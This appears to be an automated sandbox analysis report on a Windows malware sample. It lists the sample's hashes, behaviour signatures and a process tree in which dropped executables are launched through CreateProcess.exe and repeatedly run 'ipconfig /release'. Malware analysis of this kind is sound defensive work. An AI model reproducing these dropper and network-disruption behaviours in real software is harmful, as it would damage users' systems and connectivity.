Analysis
-
max time kernel
150s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
27/01/2025, 20:34
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_437309d104ca341348f98d56425358fc.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
JaffaCakes118_437309d104ca341348f98d56425358fc.exe
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_437309d104ca341348f98d56425358fc.exe
-
Size
361KB
-
MD5
437309d104ca341348f98d56425358fc
-
SHA1
41494a4c7d122570ea1d14f1ba9605b0242134f5
-
SHA256
6d131c347e95abc7aedf92773ee5b94593279c62bf02528365544a663bf0826c
-
SHA512
8e140990002713aacdb5a5c42e2cf39c911f0660b75ec9a7da6ebc3e29a1dd56018d3dc3c2150e4e8ecf176a33caafb603b830cad57a7da7b482d405f5416973
-
SSDEEP
6144:WflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:WflfAsiVGjSGecvX
Malware Config
Signatures
-
Executes dropped EXE 64 IoCs
pid Process 636 ojgbvtnlgaysqkfd.exe 2676 CreateProcess.exe 2292 pkecwupjey.exe 2840 CreateProcess.exe 2732 CreateProcess.exe 2120 i_pkecwupjey.exe 2708 CreateProcess.exe 1040 lgeysqlidx.exe 2852 CreateProcess.exe 236 CreateProcess.exe 2248 i_lgeysqlidx.exe 1584 CreateProcess.exe 3040 cxrpkhcwuo.exe 2536 CreateProcess.exe 788 CreateProcess.exe 2596 i_cxrpkhcwuo.exe 2440 CreateProcess.exe 2272 wupjhbztom.exe 1236 CreateProcess.exe 2640 CreateProcess.exe 1624 i_wupjhbztom.exe 2772 CreateProcess.exe 2604 wqojgbvtnl.exe 2800 CreateProcess.exe 2836 CreateProcess.exe 2684 i_wqojgbvtnl.exe 1836 CreateProcess.exe 2068 nlfaysqkfc.exe 2692 CreateProcess.exe 1496 CreateProcess.exe 2308 i_nlfaysqkfc.exe 1560 CreateProcess.exe 1992 caupmhfzur.exe 576 CreateProcess.exe 1760 CreateProcess.exe 1704 i_caupmhfzur.exe 2096 CreateProcess.exe 1656 rmgeywrljd.exe 840 CreateProcess.exe 2476 CreateProcess.exe 2100 i_rmgeywrljd.exe 2212 CreateProcess.exe 2424 olgeysqlid.exe 2408 CreateProcess.exe 2160 CreateProcess.exe 2356 i_olgeysqlid.exe 1724 CreateProcess.exe 3028 vsnhfzxsmk.exe 2900 CreateProcess.exe 436 CreateProcess.exe 2144 i_vsnhfzxsmk.exe 2972 CreateProcess.exe 2732 usmhezxrmj.exe 268 CreateProcess.exe 2956 CreateProcess.exe 1736 i_usmhezxrmj.exe 2984 CreateProcess.exe 2384 ojhbztolge.exe 2584 CreateProcess.exe 1508 CreateProcess.exe 2824 i_ojhbztolge.exe 2084 CreateProcess.exe 1760 dysqlidxvp.exe 1900 CreateProcess.exe -
Loads dropped DLL 59 IoCs
pid Process 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 2292 pkecwupjey.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 1040 lgeysqlidx.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 3040 cxrpkhcwuo.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 2272 wupjhbztom.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 2604 wqojgbvtnl.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 2068 nlfaysqkfc.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 1992 caupmhfzur.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 1656 rmgeywrljd.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 2424 olgeysqlid.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 3028 vsnhfzxsmk.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 2732 usmhezxrmj.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 2384 ojhbztolge.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 1760 dysqlidxvp.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 2204 axsqkfcxup.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 1956 usmkezwrpj.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 2560 trmgeywqlj.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 2024 wqlidbvqni.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 2472 ysnlfdxspk.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 1692 upnhczusmg.exe 636 ojgbvtnlgaysqkfd.exe -
System Location Discovery: System Language Discovery 1 TTPs 22 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rmgeywrljd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ysnlfdxspk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language upnhczusmg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wqojgbvtnl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ojgbvtnlgaysqkfd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language caupmhfzur.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language olgeysqlid.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vsnhfzxsmk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axsqkfcxup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_437309d104ca341348f98d56425358fc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lgeysqlidx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cxrpkhcwuo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wupjhbztom.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nlfaysqkfc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language usmhezxrmj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dysqlidxvp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language trmgeywqlj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pkecwupjey.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wqlidbvqni.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language usmkezwrpj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ojhbztolge.exe -
Gathers network information 2 TTPs 19 IoCs
Uses commandline utility to view network configuration.
pid Process 2124 ipconfig.exe 1664 ipconfig.exe 984 ipconfig.exe 2220 ipconfig.exe 2752 ipconfig.exe 1728 ipconfig.exe 2780 ipconfig.exe 2820 ipconfig.exe 1176 ipconfig.exe 2236 ipconfig.exe 2280 ipconfig.exe 2032 ipconfig.exe 2092 ipconfig.exe 1700 ipconfig.exe 1980 ipconfig.exe 2452 ipconfig.exe 2912 ipconfig.exe 2276 ipconfig.exe 1792 ipconfig.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "444171956" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{252E1941-DCEE-11EF-8121-F6D98E36DBEF} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000023d48ee11fb50b40b431f9f144d107fb00000000020000000000106600000001000020000000c2be43dedc1c740dbfd7d79e0ca519e10a428e60168afb334edbd32bb2c1b68c000000000e8000000002000020000000ad85904af684a0ac4a05d5223b15aa92659a2de538db340b4bc79b6981c8abcc90000000dc10478aa9ef719d8a4f5246d068c2e9b90fa80757af97c66aa32310dd04ba61621f83e981f06bb699beab7ad38871cfa2c751426cd6de1ccb99e3300cd864b2876f19f904d7c184106dae3401b385ba1710dcd3299fb45a1beadfa7be4ed94fe3ffa35648200e2aa5dff3311fc2a653747ea19d84e26a7c1fe233e8ceb52d598d115418ea105adfe5fcacd5c05166c740000000affb68967fa78a71debdeadea2d10ac4522a879080e4c98c512095a4074a4d3428fc4ec4f511f722b83dcbf4cafcbaae5e075c62a80c6f434b70adfe68f791fb iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000023d48ee11fb50b40b431f9f144d107fb000000000200000000001066000000010000200000002778afc389a971e62ac9d1793352ec25bba45f86875d5a60268291980440ec52000000000e80000000020000200000007c9293987ed2dbc789a5101332c660cc9283f003b18e359266451779b42f409d200000006b1563f77b3c808b9082ced6487c6cc20dae70a80af71732660ebeb84a78d1e740000000dae63e5b7fdbf2e4496d6a91a5cf28b80a9702f159b8c47697988b2c84ee59f7f77077e98ebe67b38291ce0ed714180cb4673c7a970153549947385bf63dbaab iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0af18fdfa70db01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 636 ojgbvtnlgaysqkfd.exe 2292 pkecwupjey.exe 2292 pkecwupjey.exe 2292 pkecwupjey.exe 2292 pkecwupjey.exe 2292 pkecwupjey.exe 2292 pkecwupjey.exe 2292 pkecwupjey.exe 2120 i_pkecwupjey.exe 2120 i_pkecwupjey.exe 2120 i_pkecwupjey.exe 2120 i_pkecwupjey.exe 2120 i_pkecwupjey.exe 2120 i_pkecwupjey.exe 2120 i_pkecwupjey.exe 1040 lgeysqlidx.exe 1040 lgeysqlidx.exe 1040 lgeysqlidx.exe 1040 lgeysqlidx.exe 1040 lgeysqlidx.exe 1040 lgeysqlidx.exe 1040 lgeysqlidx.exe 2248 i_lgeysqlidx.exe 2248 i_lgeysqlidx.exe 2248 i_lgeysqlidx.exe 2248 i_lgeysqlidx.exe 2248 i_lgeysqlidx.exe 2248 i_lgeysqlidx.exe 2248 i_lgeysqlidx.exe 3040 cxrpkhcwuo.exe -
Suspicious behavior: LoadsDriver 20 IoCs
pid Process 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found 468 Process not Found -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 2120 i_pkecwupjey.exe Token: SeDebugPrivilege 2248 i_lgeysqlidx.exe Token: SeDebugPrivilege 2596 i_cxrpkhcwuo.exe Token: SeDebugPrivilege 1624 i_wupjhbztom.exe Token: SeDebugPrivilege 2684 i_wqojgbvtnl.exe Token: SeDebugPrivilege 2308 i_nlfaysqkfc.exe Token: SeDebugPrivilege 1704 i_caupmhfzur.exe Token: SeDebugPrivilege 2100 i_rmgeywrljd.exe Token: SeDebugPrivilege 2356 i_olgeysqlid.exe Token: SeDebugPrivilege 2144 i_vsnhfzxsmk.exe Token: SeDebugPrivilege 1736 i_usmhezxrmj.exe Token: SeDebugPrivilege 2824 i_ojhbztolge.exe Token: SeDebugPrivilege 1972 i_dysqlidxvp.exe Token: SeDebugPrivilege 2516 i_axsqkfcxup.exe Token: SeDebugPrivilege 2876 i_usmkezwrpj.exe Token: SeDebugPrivilege 1772 i_trmgeywqlj.exe Token: SeDebugPrivilege 1028 i_wqlidbvqni.exe Token: SeDebugPrivilege 2272 i_ysnlfdxspk.exe Token: SeDebugPrivilege 2416 i_upnhczusmg.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2176 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2176 iexplore.exe 2176 iexplore.exe 2148 IEXPLORE.EXE 2148 IEXPLORE.EXE 2148 IEXPLORE.EXE 2148 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2608 wrote to memory of 636 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 29 PID 2608 wrote to memory of 636 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 29 PID 2608 wrote to memory of 636 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 29 PID 2608 wrote to memory of 636 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 29 PID 2608 wrote to memory of 2176 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 30 PID 2608 wrote to memory of 2176 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 30 PID 2608 wrote to memory of 2176 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 30 PID 2608 wrote to memory of 2176 2608 JaffaCakes118_437309d104ca341348f98d56425358fc.exe 30 PID 2176 wrote to memory of 2148 2176 iexplore.exe 31 PID 2176 wrote to memory of 2148 2176 iexplore.exe 31 PID 2176 wrote to memory of 2148 2176 iexplore.exe 31 PID 2176 wrote to memory of 2148 2176 iexplore.exe 31 PID 636 wrote to memory of 2676 636 ojgbvtnlgaysqkfd.exe 32 PID 636 wrote to memory of 2676 636 ojgbvtnlgaysqkfd.exe 32 PID 636 wrote to memory of 2676 636 ojgbvtnlgaysqkfd.exe 32 PID 636 wrote to memory of 2676 636 ojgbvtnlgaysqkfd.exe 32 PID 2292 wrote to memory of 2840 2292 pkecwupjey.exe 35 PID 2292 wrote to memory of 2840 2292 pkecwupjey.exe 35 PID 2292 wrote to memory of 2840 2292 pkecwupjey.exe 35 PID 2292 wrote to memory of 2840 2292 pkecwupjey.exe 35 PID 636 wrote to memory of 2732 636 ojgbvtnlgaysqkfd.exe 38 PID 636 wrote to memory of 2732 636 ojgbvtnlgaysqkfd.exe 38 PID 636 wrote to memory of 2732 636 ojgbvtnlgaysqkfd.exe 38 PID 636 wrote to memory of 2732 636 ojgbvtnlgaysqkfd.exe 38 PID 636 wrote to memory of 2708 636 ojgbvtnlgaysqkfd.exe 40 PID 636 wrote to memory of 2708 636 ojgbvtnlgaysqkfd.exe 40 PID 636 wrote to memory of 2708 636 ojgbvtnlgaysqkfd.exe 40 PID 636 wrote to memory of 2708 636 ojgbvtnlgaysqkfd.exe 40 PID 1040 wrote to memory of 2852 1040 lgeysqlidx.exe 42 PID 1040 wrote to memory of 2852 1040 lgeysqlidx.exe 42 PID 1040 wrote to memory of 2852 1040 lgeysqlidx.exe 42 PID 1040 wrote to memory of 2852 1040 lgeysqlidx.exe 42 PID 636 wrote to memory of 236 636 ojgbvtnlgaysqkfd.exe 45 PID 636 wrote to memory of 236 636 ojgbvtnlgaysqkfd.exe 45 PID 636 wrote to memory of 236 636 ojgbvtnlgaysqkfd.exe 45 PID 636 wrote to memory of 236 636 ojgbvtnlgaysqkfd.exe 45 PID 636 wrote to memory of 1584 636 ojgbvtnlgaysqkfd.exe 47 PID 636 wrote to memory of 1584 636 ojgbvtnlgaysqkfd.exe 47 PID 636 wrote to memory of 1584 636 ojgbvtnlgaysqkfd.exe 47 PID 636 wrote to memory of 1584 636 ojgbvtnlgaysqkfd.exe 47 PID 3040 wrote to memory of 2536 3040 cxrpkhcwuo.exe 49 PID 3040 wrote to memory of 2536 3040 cxrpkhcwuo.exe 49 PID 3040 wrote to memory of 2536 3040 cxrpkhcwuo.exe 49 PID 3040 wrote to memory of 2536 3040 cxrpkhcwuo.exe 49 PID 636 wrote to memory of 788 636 ojgbvtnlgaysqkfd.exe 52 PID 636 wrote to memory of 788 636 ojgbvtnlgaysqkfd.exe 52 PID 636 wrote to memory of 788 636 ojgbvtnlgaysqkfd.exe 52 PID 636 wrote to memory of 788 636 ojgbvtnlgaysqkfd.exe 52 PID 636 wrote to memory of 2440 636 ojgbvtnlgaysqkfd.exe 54 PID 636 wrote to memory of 2440 636 ojgbvtnlgaysqkfd.exe 54 PID 636 wrote to memory of 2440 636 ojgbvtnlgaysqkfd.exe 54 PID 636 wrote to memory of 2440 636 ojgbvtnlgaysqkfd.exe 54 PID 2272 wrote to memory of 1236 2272 wupjhbztom.exe 56 PID 2272 wrote to memory of 1236 2272 wupjhbztom.exe 56 PID 2272 wrote to memory of 1236 2272 wupjhbztom.exe 56 PID 2272 wrote to memory of 1236 2272 wupjhbztom.exe 56 PID 636 wrote to memory of 2640 636 ojgbvtnlgaysqkfd.exe 59 PID 636 wrote to memory of 2640 636 ojgbvtnlgaysqkfd.exe 59 PID 636 wrote to memory of 2640 636 ojgbvtnlgaysqkfd.exe 59 PID 636 wrote to memory of 2640 636 ojgbvtnlgaysqkfd.exe 59 PID 636 wrote to memory of 2772 636 ojgbvtnlgaysqkfd.exe 61 PID 636 wrote to memory of 2772 636 ojgbvtnlgaysqkfd.exe 61 PID 636 wrote to memory of 2772 636 ojgbvtnlgaysqkfd.exe 61 PID 636 wrote to memory of 2772 636 ojgbvtnlgaysqkfd.exe 61
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Temp\ojgbvtnlgaysqkfd.exeC:\Temp\ojgbvtnlgaysqkfd.exe run2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:636 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\pkecwupjey.exe ups_run3⤵
- Executes dropped EXE
PID:2676 -
C:\Temp\pkecwupjey.exeC:\Temp\pkecwupjey.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:2840 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:2780
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_pkecwupjey.exe ups_ins3⤵
- Executes dropped EXE
PID:2732 -
C:\Temp\i_pkecwupjey.exeC:\Temp\i_pkecwupjey.exe ups_ins4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2120
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\lgeysqlidx.exe ups_run3⤵
- Executes dropped EXE
PID:2708 -
C:\Temp\lgeysqlidx.exeC:\Temp\lgeysqlidx.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:2852 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:1980
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_lgeysqlidx.exe ups_ins3⤵
- Executes dropped EXE
PID:236 -
C:\Temp\i_lgeysqlidx.exeC:\Temp\i_lgeysqlidx.exe ups_ins4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\cxrpkhcwuo.exe ups_run3⤵
- Executes dropped EXE
PID:1584 -
C:\Temp\cxrpkhcwuo.exeC:\Temp\cxrpkhcwuo.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:2536 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:2124
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_cxrpkhcwuo.exe ups_ins3⤵
- Executes dropped EXE
PID:788 -
C:\Temp\i_cxrpkhcwuo.exeC:\Temp\i_cxrpkhcwuo.exe ups_ins4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\wupjhbztom.exe ups_run3⤵
- Executes dropped EXE
PID:2440 -
C:\Temp\wupjhbztom.exeC:\Temp\wupjhbztom.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:1236 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:1792
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_wupjhbztom.exe ups_ins3⤵
- Executes dropped EXE
PID:2640 -
C:\Temp\i_wupjhbztom.exeC:\Temp\i_wupjhbztom.exe ups_ins4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
-
